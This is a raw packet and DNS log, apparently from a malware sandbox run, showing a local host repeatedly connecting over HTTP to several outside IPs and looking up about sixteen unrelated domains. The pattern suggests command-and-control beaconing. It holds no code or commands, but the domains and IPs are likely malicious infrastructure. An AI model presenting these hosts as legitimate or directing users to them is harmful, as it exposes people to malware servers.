Nov 21, 2024 12:54:22.009234905 CET | 80 | 49800 | 85.159.66.93 | 192.168.2.4
Nov 21, 2024 12:54:23.406374931 CET | 49800 | 80 | 192.168.2.4 | 85.159.66.93
Nov 21, 2024 12:54:23.532843113 CET | 80 | 49800 | 85.159.66.93 | 192.168.2.4
Nov 21, 2024 12:54:23.533011913 CET | 49800 | 80 | 192.168.2.4 | 85.159.66.93
Nov 21, 2024 12:54:24.424411058 CET | 49810 | 80 | 192.168.2.4 | 85.159.66.93
Nov 21, 2024 12:54:24.544384003 CET | 80 | 49810 | 85.159.66.93 | 192.168.2.4
Nov 21, 2024 12:54:24.544469118 CET | 49810 | 80 | 192.168.2.4 | 85.159.66.93
Nov 21, 2024 12:54:24.547323942 CET | 49810 | 80 | 192.168.2.4 | 85.159.66.93
Nov 21, 2024 12:54:24.668937922 CET | 80 | 49810 | 85.159.66.93 | 192.168.2.4
Nov 21, 2024 12:54:24.668952942 CET | 80 | 49810 | 85.159.66.93 | 192.168.2.4
Nov 21, 2024 12:54:24.668965101 CET | 80 | 49810 | 85.159.66.93 | 192.168.2.4
Nov 21, 2024 12:54:24.668982983 CET | 80 | 49810 | 85.159.66.93 | 192.168.2.4
Nov 21, 2024 12:54:24.669039011 CET | 80 | 49810 | 85.159.66.93 | 192.168.2.4
Nov 21, 2024 12:54:24.669048071 CET | 80 | 49810 | 85.159.66.93 | 192.168.2.4
Nov 21, 2024 12:54:24.669136047 CET | 80 | 49810 | 85.159.66.93 | 192.168.2.4
Nov 21, 2024 12:54:24.669146061 CET | 80 | 49810 | 85.159.66.93 | 192.168.2.4
Nov 21, 2024 12:54:24.669204950 CET | 80 | 49810 | 85.159.66.93 | 192.168.2.4
Nov 21, 2024 12:54:26.064253092 CET | 49810 | 80 | 192.168.2.4 | 85.159.66.93
Nov 21, 2024 12:54:26.188844919 CET | 80 | 49810 | 85.159.66.93 | 192.168.2.4
Nov 21, 2024 12:54:26.189059973 CET | 49810 | 80 | 192.168.2.4 | 85.159.66.93
Nov 21, 2024 12:54:27.083056927 CET | 49816 | 80 | 192.168.2.4 | 85.159.66.93
Nov 21, 2024 12:54:27.202827930 CET | 80 | 49816 | 85.159.66.93 | 192.168.2.4
Nov 21, 2024 12:54:27.203088045 CET | 49816 | 80 | 192.168.2.4 | 85.159.66.93
Nov 21, 2024 12:54:27.206227064 CET | 49816 | 80 | 192.168.2.4 | 85.159.66.93
Nov 21, 2024 12:54:27.325795889 CET | 80 | 49816 | 85.159.66.93 | 192.168.2.4
Nov 21, 2024 12:55:28.530539036 CET | 80 | 49816 | 85.159.66.93 | 192.168.2.4
Nov 21, 2024 12:55:28.530695915 CET | 80 | 49816 | 85.159.66.93 | 192.168.2.4
Nov 21, 2024 12:55:28.530745029 CET | 49816 | 80 | 192.168.2.4 | 85.159.66.93
Nov 21, 2024 12:55:28.556145906 CET | 49816 | 80 | 192.168.2.4 | 85.159.66.93
Nov 21, 2024 12:55:28.839049101 CET | 80 | 49816 | 85.159.66.93 | 192.168.2.4
Nov 21, 2024 12:55:33.802694082 CET | 49961 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:33.925224066 CET | 80 | 49961 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:33.925671101 CET | 49961 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:33.929876089 CET | 49961 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:34.049462080 CET | 80 | 49961 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:35.249577045 CET | 80 | 49961 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:35.249766111 CET | 80 | 49961 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:35.249814987 CET | 49961 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:35.436752081 CET | 49961 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:36.455219030 CET | 49969 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:36.575357914 CET | 80 | 49969 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:36.575459003 CET | 49969 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:36.577708006 CET | 49969 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:36.697866917 CET | 80 | 49969 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:37.945368052 CET | 80 | 49969 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:37.945430994 CET | 80 | 49969 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:37.945626974 CET | 49969 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:38.095134974 CET | 49969 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:39.120584011 CET | 49975 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:39.240108013 CET | 80 | 49975 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:39.240190983 CET | 49975 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:39.244597912 CET | 49975 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:39.364460945 CET | 80 | 49975 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:39.364501953 CET | 80 | 49975 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:39.364531994 CET | 80 | 49975 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:39.364583969 CET | 80 | 49975 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:39.364612103 CET | 80 | 49975 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:39.364641905 CET | 80 | 49975 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:39.364674091 CET | 80 | 49975 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:39.375669956 CET | 80 | 49975 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:39.393557072 CET | 80 | 49975 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:40.519042015 CET | 80 | 49975 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:40.614703894 CET | 80 | 49975 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:40.615031004 CET | 49975 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:40.749263048 CET | 49975 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:41.773659945 CET | 49983 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:41.893635988 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:41.894107103 CET | 49983 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:41.896395922 CET | 49983 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:42.018748999 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.312450886 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.312478065 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.312493086 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.312515974 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.312531948 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.312547922 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.312603951 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.312619925 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.312638044 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.312624931 CET | 49983 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:43.312654972 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.312706947 CET | 49983 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:43.312706947 CET | 49983 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:43.312706947 CET | 49983 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:43.433368921 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.433487892 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.433598042 CET | 49983 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:43.437576056 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.513907909 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.513946056 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.514089108 CET | 49983 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:43.518105030 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.518198967 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.518584967 CET | 49983 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:43.526566982 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.526592016 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.526747942 CET | 49983 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:43.535063028 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.535161018 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.535339117 CET | 49983 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:43.543471098 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:43.545420885 CET | 49983 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:43.547861099 CET | 49983 | 80 | 192.168.2.4 | 91.195.240.94
Nov 21, 2024 12:55:43.673122883 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.4
Nov 21, 2024 12:55:57.225104094 CET | 50015 | 80 | 192.168.2.4 | 66.29.149.46
Nov 21, 2024 12:55:57.344620943 CET | 80 | 50015 | 66.29.149.46 | 192.168.2.4
Nov 21, 2024 12:55:57.344718933 CET | 50015 | 80 | 192.168.2.4 | 66.29.149.46
Nov 21, 2024 12:55:57.346892118 CET | 50015 | 80 | 192.168.2.4 | 66.29.149.46
Nov 21, 2024 12:55:57.466387987 CET | 80 | 50015 | 66.29.149.46 | 192.168.2.4
Nov 21, 2024 12:55:58.673803091 CET | 80 | 50015 | 66.29.149.46 | 192.168.2.4
Nov 21, 2024 12:55:58.673887014 CET | 80 | 50015 | 66.29.149.46 | 192.168.2.4
Nov 21, 2024 12:55:58.673950911 CET | 50015 | 80 | 192.168.2.4 | 66.29.149.46
Nov 21, 2024 12:55:58.858911037 CET | 50015 | 80 | 192.168.2.4 | 66.29.149.46
Nov 21, 2024 12:55:59.880698919 CET | 50016 | 80 | 192.168.2.4 | 66.29.149.46
                                                                              Nov 21, 2024 12:56:00.001380920 CET805001666.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:00.003345013 CET5001680192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:00.007350922 CET5001680192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:00.126848936 CET805001666.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:01.298811913 CET805001666.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:01.298865080 CET805001666.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:01.298919916 CET5001680192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:01.514900923 CET5001680192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:02.534255028 CET5001780192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:02.653744936 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:02.653835058 CET5001780192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:02.656513929 CET5001780192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:02.776141882 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:02.776159048 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:02.776177883 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:02.776187897 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:02.776285887 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:02.776294947 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:02.776365995 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:02.776376009 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:02.776422977 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:04.057415962 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:04.057724953 CET805001766.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:04.061753035 CET5001780192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:04.171211004 CET5001780192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:05.190121889 CET5001880192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:05.309693098 CET805001866.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:05.309767962 CET5001880192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:05.312531948 CET5001880192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:05.432277918 CET805001866.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:06.621342897 CET805001866.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:06.621460915 CET805001866.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:06.621579885 CET5001880192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:06.625382900 CET5001880192.168.2.466.29.149.46
                                                                              Nov 21, 2024 12:56:06.744738102 CET805001866.29.149.46192.168.2.4
                                                                              Nov 21, 2024 12:56:11.973807096 CET5001980192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:12.100615978 CET8050019195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:12.100739956 CET5001980192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:12.102693081 CET5001980192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:12.225212097 CET8050019195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:13.514568090 CET8050019195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:13.514950991 CET8050019195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:13.515067101 CET5001980192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:13.611239910 CET5001980192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:14.627895117 CET5002080192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:14.748511076 CET8050020195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:14.748590946 CET5002080192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:14.750911951 CET5002080192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:14.876847029 CET8050020195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:16.110126972 CET8050020195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:16.110294104 CET8050020195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:16.110560894 CET5002080192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:16.265285015 CET5002080192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:17.285438061 CET5002180192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:17.405437946 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:17.405527115 CET5002180192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:17.412246943 CET5002180192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:17.531936884 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:17.531949997 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:17.532079935 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:17.532089949 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:17.532165051 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:17.532188892 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:17.532284975 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:17.532294035 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:17.532303095 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:18.871484041 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:18.871665001 CET8050021195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:18.871711969 CET5002180192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:18.977075100 CET5002180192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:19.986546993 CET5002280192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:20.106112957 CET8050022195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:20.107228994 CET5002280192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:20.111155987 CET5002280192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:20.231242895 CET8050022195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:21.508615971 CET8050022195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:21.509147882 CET8050022195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:21.509284019 CET5002280192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:21.521083117 CET5002280192.168.2.4195.110.124.133
                                                                              Nov 21, 2024 12:56:21.640574932 CET8050022195.110.124.133192.168.2.4
                                                                              Nov 21, 2024 12:56:43.454401970 CET5002380192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:43.575377941 CET8050023217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:43.575445890 CET5002380192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:43.579153061 CET5002380192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:43.698653936 CET8050023217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:44.789330006 CET8050023217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:44.789491892 CET8050023217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:44.789531946 CET5002380192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:45.093661070 CET5002380192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:46.121397972 CET5002480192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:46.241230965 CET8050024217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:46.241511106 CET5002480192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:46.245217085 CET5002480192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:46.364840031 CET8050024217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:47.450048923 CET8050024217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:47.450176954 CET8050024217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:47.450225115 CET5002480192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:47.749428034 CET5002480192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:48.770788908 CET5002580192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:48.893259048 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:48.893346071 CET5002580192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:48.896096945 CET5002580192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:49.016052008 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:49.016072989 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:49.016125917 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:49.016205072 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:49.016314983 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:49.016324997 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:49.016418934 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:49.016510963 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:49.016520023 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:50.143673897 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:50.143776894 CET8050025217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:50.147365093 CET5002580192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:50.405630112 CET5002580192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:51.424727917 CET5002680192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:51.544450045 CET8050026217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:51.544528961 CET5002680192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:51.546552896 CET5002680192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:51.666095972 CET8050026217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:52.794786930 CET8050026217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:52.795490026 CET8050026217.196.55.202192.168.2.4
                                                                              Nov 21, 2024 12:56:52.795541048 CET5002680192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:52.799290895 CET5002680192.168.2.4217.196.55.202
                                                                              Nov 21, 2024 12:56:52.918823957 CET8050026217.196.55.202192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 21, 2024 12:53:28.591357946 CET | 50531 | 53 | 192.168.2.4 | 1.1.1.1
Nov 21, 2024 12:53:29.577212095 CET | 50531 | 53 | 192.168.2.4 | 1.1.1.1
Nov 21, 2024 12:53:30.204037905 CET | 53 | 50531 | 1.1.1.1 | 192.168.2.4
Nov 21, 2024 12:53:30.204058886 CET | 53 | 50531 | 1.1.1.1 | 192.168.2.4
Nov 21, 2024 12:53:46.970890999 CET | 52006 | 53 | 192.168.2.4 | 1.1.1.1
Nov 21, 2024 12:53:47.214026928 CET | 53 | 52006 | 1.1.1.1 | 192.168.2.4
Nov 21, 2024 12:53:55.284862041 CET | 58965 | 53 | 192.168.2.4 | 1.1.1.1
Nov 21, 2024 12:53:55.897166014 CET | 53 | 58965 | 1.1.1.1 | 192.168.2.4
Nov 21, 2024 12:54:10.503308058 CET | 63881 | 53 | 192.168.2.4 | 1.1.1.1
Nov 21, 2024 12:54:10.731642008 CET | 53 | 63881 | 1.1.1.1 | 192.168.2.4
Nov 21, 2024 12:54:18.785253048 CET | 61466 | 53 | 192.168.2.4 | 1.1.1.1
Nov 21, 2024 12:54:19.113535881 CET | 53 | 61466 | 1.1.1.1 | 192.168.2.4
Nov 21, 2024 12:55:33.566903114 CET | 59601 | 53 | 192.168.2.4 | 1.1.1.1
Nov 21, 2024 12:55:33.799339056 CET | 53 | 59601 | 1.1.1.1 | 192.168.2.4
Nov 21, 2024 12:55:48.568994045 CET | 57000 | 53 | 192.168.2.4 | 1.1.1.1
Nov 21, 2024 12:55:48.804826975 CET | 53 | 57000 | 1.1.1.1 | 192.168.2.4
Nov 21, 2024 12:55:56.972629070 CET | 55934 | 53 | 192.168.2.4 | 1.1.1.1
Nov 21, 2024 12:55:57.222434044 CET | 53 | 55934 | 1.1.1.1 | 192.168.2.4
Nov 21, 2024 12:56:11.643075943 CET | 56609 | 53 | 192.168.2.4 | 1.1.1.1
Nov 21, 2024 12:56:11.971231937 CET | 53 | 56609 | 1.1.1.1 | 192.168.2.4
Nov 21, 2024 12:56:26.535161018 CET | 55927 | 53 | 192.168.2.4 | 1.1.1.1
Nov 21, 2024 12:56:26.785492897 CET | 53 | 55927 | 1.1.1.1 | 192.168.2.4
Nov 21, 2024 12:56:34.847003937 CET | 62212 | 53 | 192.168.2.4 | 1.1.1.1
Nov 21, 2024 12:56:35.084980965 CET | 53 | 62212 | 1.1.1.1 | 192.168.2.4
Nov 21, 2024 12:56:43.160325050 CET | 51362 | 53 | 192.168.2.4 | 1.1.1.1
Nov 21, 2024 12:56:43.448860884 CET | 53 | 51362 | 1.1.1.1 | 192.168.2.4
Nov 21, 2024 12:56:57.819225073 CET | 55229 | 53 | 192.168.2.4 | 1.1.1.1
Nov 21, 2024 12:56:58.076641083 CET | 53 | 55229 | 1.1.1.1 | 192.168.2.4
Nov 21, 2024 12:57:06.643129110 CET | 64390 | 53 | 192.168.2.4 | 1.1.1.1
Nov 21, 2024 12:57:06.887583971 CET | 53 | 64390 | 1.1.1.1 | 192.168.2.4
Nov 21, 2024 12:57:14.941781998 CET | 58290 | 53 | 192.168.2.4 | 1.1.1.1
Nov 21, 2024 12:57:15.176017046 CET | 53 | 58290 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 21, 2024 12:53:28.591357946 CET | 192.168.2.4 | 1.1.1.1 | 0xe1d5 | Standard query (0) | www.3xfootball.com | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:53:29.577212095 CET | 192.168.2.4 | 1.1.1.1 | 0xe1d5 | Standard query (0) | www.3xfootball.com | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:53:46.970890999 CET | 192.168.2.4 | 1.1.1.1 | 0x3064 | Standard query (0) | www.kasegitai.tokyo | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:53:55.284862041 CET | 192.168.2.4 | 1.1.1.1 | 0xa00f | Standard query (0) | www.goldenjade-travel.com | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:54:10.503308058 CET | 192.168.2.4 | 1.1.1.1 | 0xc423 | Standard query (0) | www.antonio-vivaldi.mobi | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:54:18.785253048 CET | 192.168.2.4 | 1.1.1.1 | 0xdb82 | Standard query (0) | www.magmadokum.com | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:55:33.566903114 CET | 192.168.2.4 | 1.1.1.1 | 0x3006 | Standard query (0) | www.rssnewscast.com | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:55:48.568994045 CET | 192.168.2.4 | 1.1.1.1 | 0x22ca | Standard query (0) | www.liangyuen528.com | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:55:56.972629070 CET | 192.168.2.4 | 1.1.1.1 | 0xfffa | Standard query (0) | www.techchains.info | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:56:11.643075943 CET | 192.168.2.4 | 1.1.1.1 | 0x51ab | Standard query (0) | www.elettrosistemista.zip | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:56:26.535161018 CET | 192.168.2.4 | 1.1.1.1 | 0x7c07 | Standard query (0) | www.donnavariedades.com | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:56:34.847003937 CET | 192.168.2.4 | 1.1.1.1 | 0x280f | Standard query (0) | www.660danm.top | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:56:43.160325050 CET | 192.168.2.4 | 1.1.1.1 | 0x248a | Standard query (0) | www.empowermedeco.com | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:56:57.819225073 CET | 192.168.2.4 | 1.1.1.1 | 0xfd21 | Standard query (0) | www.joyesi.xyz | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:57:06.643129110 CET | 192.168.2.4 | 1.1.1.1 | 0xbe75 | Standard query (0) | www.k9vyp11no3.cfd | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:57:14.941781998 CET | 192.168.2.4 | 1.1.1.1 | 0x54fa | Standard query (0) | www.shenzhoucui.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 21, 2024 12:53:30.204037905 CET | 1.1.1.1 | 192.168.2.4 | 0xe1d5 | No error (0) | www.3xfootball.com | | 154.215.72.110 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:53:30.204058886 CET | 1.1.1.1 | 192.168.2.4 | 0xe1d5 | No error (0) | www.3xfootball.com | | 154.215.72.110 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:53:47.214026928 CET | 1.1.1.1 | 192.168.2.4 | 0x3064 | Name error (3) | www.kasegitai.tokyo | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:53:55.897166014 CET | 1.1.1.1 | 192.168.2.4 | 0xa00f | No error (0) | www.goldenjade-travel.com | | 116.50.37.244 | A (IP address) | IN (0x0001) | false
